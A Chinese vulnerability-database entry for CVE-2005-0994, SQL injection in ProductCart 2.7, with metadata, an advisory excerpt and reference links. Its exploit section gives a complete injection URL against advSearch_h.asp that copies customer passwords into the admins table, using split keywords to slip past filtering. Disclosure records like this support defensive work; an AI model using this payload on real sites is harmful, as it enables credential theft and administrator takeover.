ProductCart多个输入验证漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107723 漏洞类型 SQL注入
发布时间 2004-02-16 更新时间 2006-09-25
CVE编号 CVE-2005-0994 CNNVD-ID CNNVD-200505-694
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/23703
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-694
|漏洞详情
ProductCart2.7存在多个SQL注入漏洞,远程攻击者可以通过(1)传给advSearch_h.asp的Category或resultCnt参数,以及可能的(2)传给tarinasworld_butterflyjournal.asp的offset参数执行任意SQL命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/9669/info
 
EarlyImpact ProductCart is reportedly prone to multiple vulnerabilities. The specific issues include SQL injection, cross-site scripting and cryptographic weaknesses. These issues could expose sensitive data such as user credentials and allow for execution of hostile script code and HTML. These issues could allow for full compromise of the software.

http://www.example.com/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;in--sert%20into%20admins%20(idadmin,%20adminpassword,%20adminlevel
+)%20s--elect%20lastName,%20password,%20name%20from%20customers%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&I
+DBrand=0&resultCnt=200&Submit.x=33&
|参考资料

来源:BID
名称:12990
链接:http://www.securityfocus.com/bid/12990
来源:OSVDB
名称:15265
链接:http://www.osvdb.org/15265
来源:OSVDB
名称:15263
链接:http://www.osvdb.org/15263
来源:SECUNIA
名称:14833
链接:http://secunia.com/advisories/14833